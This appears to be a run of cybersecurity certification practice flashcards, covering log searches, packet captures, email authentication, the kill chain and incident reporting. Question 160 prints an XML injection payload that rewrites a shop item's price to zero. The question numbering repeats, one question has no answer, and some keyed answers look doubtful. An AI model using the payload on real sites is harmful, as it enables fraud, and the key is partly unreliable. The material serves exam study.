You have been hired to investigate a possible insider threat from a user named Terri. Which of the following commands would successfully look through all the log files in ‘/var/log’ for any references to “Terri” or “terri” on a Linux server?

A. find /var/log/ -exec grep -H -e “‘terri’ OR ‘Terri’” {}\;2> /dev/null
B. find /var/log/ -name *.log -exec grep -H -e “‘Terri’ OR ‘terri’” {} \;2>/dev/null
C. find /var/log/ -exec grep -H -e “[Tt]erri” {} \;2> /dev/null
D. find /var/log/ -name “*.log” -exec grep -H -e “[Tt]erri” {} \;2>/dev/null

A

C. find /var/log/ -exec grep -H -e “[Tt]erri” {} \;2> /dev/null

154
Q

Ted, a file server admin, has noticed that a large number of sensitive files have been transferred from a corporate workstation to an IP address outside of the local area network. Ted contacts his company’s security analyst, who verifies that the workstation’s anti-malware solution is up-to-date, and the network’s firewall is properly configured. What type of attack most likely occurred to allow the exfiltration of the files from the workstation?

A. Session hijacking
B. Zero-day
C. MAC spoofing
D. Impersonation

A

B. Zero-day

155
Q

You are conducting a code review of a program and observe that the following calculation of 0xffffffff+1 was attempted, but the result was returned as 0x0000000. Based on this, what type of exploit could be created against this program?

A. Password spraying
B. Integer overflow attack
C. Impersonation
D. SQL injection

A

B. Integer overflow attack

156
Q

You are investigating traffic involving three separate IP addresses (192.168.66.6, 10.66.6.10, and 172.16.66.1). Which REGEX expression would you use to be able to capture ONLY those three IP addresses in a single statement?

A. \b[192.168.66.6]+[10.66.6.10]+[172.16.66.1]\b
B. \b(192.168.66.6)+(10.66.6.10)+(172.16.66.1)\b
C. \b[192.168.66.6]|[10.66.6.10]|[172.16.66.1]\b
D. \b(192.168.66.6)|(10.66.6.10)|(172.16.66.1)\b

A
156
Q

A cybersecurity analyst is attempting to classify network traffic within an organization. The analyst runs the tcpdump command and receives the following:
$ tcpdump -n -i eth0
15:01:35.170763 IP 10.0.19.121.52497>11.154.12.121.ssh: P 105:157(52) ack 1806 win 16549
15:01:35.170776 IP 11.154.12.121.ssh>10.0.19.121.52397: P 23988:24136(148) ack 157 win 113
15:01:35.170894 IP 11.154.12.121.ssh>10.0.19.121.52497: P 24136:24380(244) ack 157 win 113

Which statement is true?

A. 11.154.12.121 is under attack from a host at 10.0.19.121
B. 11.154.12.121 is a client that is accessing an SSH server over port 52497
C. 10.0.19.121 is a client that is accessing an SSH server over port 52497
D. 10.0.19.121 is under attack from a host at 11.154.12.121

A

C. 10.0.19.121 is a client accessing an SSH server over port 52497

157
Q

You just visited an e-commerce website by typing in its URL during a vulnerability assessment. You discovered that an administrative web frontend for the server’s backend application is accessible over the internet. Testing this frontend, you discovered that the default password for the application is accepted. Which of the following recommendations should you make to the website owner to remediate this discovered vulnerability? (Select 3)

A. Conduct a penetration test against the organization’s IP space
B. Require two-factor authentication for access to the application
C. Whitelist all specific IP blocks that use this application
D. Rename the URL to a more obscure name
E. Require an alphanumeric passphrase for the application’s default password
F. Change the username and default password

A

B. Require two-factor authentication for access to the application

C. Whitelist all specific IP blocks that use this application

F. Change the username and default password

158
Q

Which of the following provides a cryptographic authentication mechanism to positively identify an organization as the authorized sender of email for a particular domain name?

A. DKIM
B. DMARC
C. SMTP
D. SPF

A

A. DKIM

159
Q

You are going to perform a forensic disk image of a macOS laptop. What type of hard drive format should you expect to encounter?

A. exFAT
B. HFS+
C. NTFS
D. FAT32

A

B. HFS+

Hierarchical File System Plus
macOS doesn’t support FAT32 and exFAT

160
Q

You are analyzing the SIEM for your company’s e-commerce server when you notice the following URL in the logs of your SIEM:
https://www.diontraining.com/add_to_cart.php?itemId=5"+perItemPrice="0.00"+quantity="100"+/>

A. SQL injection
B. Session hijacking
C. Buffer overflow
D. XML injection

A

D. XML injection

XML injection manipulates or compromises the logic of an XML application or service.

161
Q

You suspect that your server has been the victim of a web-based attack. Which of the following ports would most likely be seen in the logs to indicate the attack’s target?

A. 443
B. 389
C. 21
D. 3389

A

A. 443

162
Q

After 9 months of C++ programming, the team at Whammiedyne systems has released their new software application. Within just 2 weeks of release, though, the security team discovered multiple serious vulnerabilities in the application that must be corrected. To retrofit the source code to include the required security controls will take 2 months of labor at the cost of $100,000. Which development framework should Whammiedyne use in the future to prevent this situation from occurring in other projects?

A. DevOps
B. Waterfall Model
C. DevSecOps
D. Agile Model

A

C. DevSecOps

163
Q

Which of the following is the most important feature to consider when designing a system on a chip?

A. Space and power savings
B. Ability to interface with industrial control systems
C. Type of real-time operating system in use
D. Ability to be reconfigured after manufacture

A

A. Space and power savings

164
Q

You are a cybersecurity analyst working for an accounting firm that manages the accounting for multiple smaller firms. You have successfully detected an APT operating in your company’s network that appears to have been there for at least 8 months. In conducting a qualitative assessment of the impact, which of the following factors should be most prominently mentioned in your report to your firm’s executives? (Select 2)

A. Downtime
B. Recovery time
C. Data integrity
D. Economic
E. Detection time

A

C. Data integrity

D. Economic

165
Q

The Pass Certs Fast corporation has recently been embarrassed by several high profile data breaches. The CIO proposes improving the company’s cybersecurity posture by migrating images of all the current servers and infrastructure into a cloud-based environment. What, if any, is the flaw in moving forward with this approach?

A. This approach only changes the location of the network and not the attack surface of it
B. This is a reasonable approach that will increase the security of the servers and infrastructure
C. The company has already paid for the physical servers and will not fully realize their ROI on them due to the migration
D. This approach assumes that the cloud will provide better security than is currently done on-site

A

A. This approach only changes the location of the network and not the attack surface of it

166
Q

You have been asked to scan your company’s website using the OWASP ZAP tool. When you perform the scan, you receive the following warning:
“The AUTOCOMPLETE output is not disabled in HTML FORM/INPUT containing password type input. Passwords may be stored in browsers and retrieved.”
You begin to investigate further by reviewing a portion of the HTML code from the website that is listed below:

<form>
Enter your username: <br></br>
<input></input><br></br>
Enter your Password: <br></br>
<input></input><br></br>
<input></input>
</form>

Based on your analysis, what action should you take?

A. You recommend that the system admin disables SSL on the server and implements TLS instead
B. You tell the developer to review their code and implement a bug/code fix
C. You recommend that the system admin pushes out a GPO update to reconfigure the web browsers’ security settings
D. This is a false positive, and you should implement a scanner exception to ensure you don’t receive this again during your next scan

A

B. You tell the developer to review their code and implement a bug/code fix

167
Q

Jack is assessing the likelihood of reconnaissance activities being performed against his organization. Which of the following would best classify the likelihood of a port scan being conducted against his DMZ?

A. None
B. High
C. Medium
D. Low

A

B. High

168
Q

An organization utilizes a BYOD policy with its employees. This allows the employees to store sensitive corporate data on their personally owned devices. Which of the following occurred if an employee accidentally left their device in the back of a taxi?

A. Failed data loss prevention
B. Failed deperimeterization management
C. An advanced persistent threat
D. A data breach

A

B. Failed deperimeterization management

169
Q

Which of the following attacks would most likely be used to create an inadvertent disclosure of information from an organization’s database?

A. SQL injection
B. Buffer overflow
C. Denial of service
D. Cross-site scripting

A

A. SQL injection

170
Q

An organization has hired a cybersecurity analyst to conduct an assessment of their current security posture. The analyst begins by conducting an external assessment against the organization’s network to determine what information is exposed to potential external attackers. What technique should the analyst perform first?

A. Enumeration
B. Intranet portal reviews
C. DNS query log reviews
D. Technical control audits

A

A. Enumeration

171
Q

Which of the following will an adversary do during the weaponization phase of the Lockheed Martin kill chain? (Select three)

A. Obtain a weaponizer
B. Conduct social media interactions with targeted individuals
C. Select a decoy document to present to the victim
D. Harvest email addresses
E. Select backdoor implant and appropriate command and control infrastructure for operation
F. Compromise the target’s servers

A

A. Obtain a weaponizer

C. Select a decoy document to present to the victim

E. Select backdoor implant and appropriate command and control infrastructure for operation

172
Q

Which of the following vulnerabilities was the MOST critical due to its high potential impact and exploitability?

A. Stagefright
B. Shellshock
C. Logjam
D. Drupalgeddon

A

B. Shellshock

173
Q

Which of the following is the difference between an incident summary report and lessons-learned report?

A. Both a lessons learned report and an incident summary report are designed for a technical audience
B. A lessons-learned report is designed for a non-technical audience
C. Both a lessons learned report and an incident summary report are designed for a non-technical audience
D. An incident summary report is designed for a non-technical audience

A

D. An incident summary report is designed for a non-technical audience

174
Q

After a sophisticated spear-phishing attack compromised your organization’s financial database, the incident response team engages in a meticulous examination of the event. They aim to preserve and scrutinize digital evidence, uncover the exact method of the breach, and gauge its impact on your organization. What is this meticulous post-incident examination known as?

A. Lessons learned
B. Incident response plan
C. Forensic analysis
D. Root cause analysis

A

C. Forensic analysis

175
Q

During an incident response, your team identified that an attacker performed a scan on your network, then delivered malware via a phishing email, which was exploited to install a backdoor on the system. The attacker then executed commands to exfiltrate data. Which framework would BEST represent this attack sequence?

A. Cyber Kill Chain
B. MITRE ATT&CK
C. OWASP Testing Guide
D. Diamond Model of Intrusion Analysis

A

A. Cyber Kill Chain